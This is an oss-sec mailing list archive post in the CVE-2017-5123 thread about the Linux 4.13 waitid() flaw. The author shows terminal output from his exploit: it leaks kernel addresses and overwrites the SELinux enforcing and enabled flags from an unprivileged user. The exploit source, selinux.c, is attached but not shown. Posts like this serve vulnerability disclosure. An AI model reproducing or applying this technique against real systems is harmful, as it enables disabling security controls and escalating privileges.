oss-sec mailing list archives
Re: CVE-2017-5123 Linux kernel v4.13 waitid() not calling access_ok()
From: up201407890 () alunos dcc fc up pt
Date: Wed, 25 Oct 2017 12:42:41 +0200
Hello, I've written a quick exploit for that vulnerability.Instead of using it for malicious purposes, I use it to actually increase my systems security.
$ id uid=1000 $ ./a.out [+] Leak size=144 bytes [+] Got kernel base: 0xffffffffb5200000 [+] Got selinux_enforcing: 0xffffffffb611cc90 [+] Got selinux_enabled: 0xffffffffb5eb1350 [+] Overwriting selinux_enforcing... [+] Overwriting selinux_enabled... [+] SELinux disabled! Enjoy, Federico Bento. PS: It's just a joke :) ---------------------------------------------------------------- This message was sent using IMP, the Internet Messaging Program.
Attachment:
selinux.c
Description:
Current thread:
- Re: CVE-2017-5123 Linux kernel v4.13 waitid() not calling access_ok() up201407890 (Oct 25)
- Re: Re: CVE-2017-5123 Linux kernel v4.13 waitid() not calling access_ok() up201407890 (Nov 05)
- Re: Re: CVE-2017-5123 Linux kernel v4.13 waitid() not calling access_ok() Solar Designer (Nov 05)
- Re: Re: CVE-2017-5123 Linux kernel v4.13 waitid() not calling access_ok() up201407890 (Nov 07)
- Re: Re: CVE-2017-5123 Linux kernel v4.13 waitid() not calling access_ok() up201407890 (Nov 05)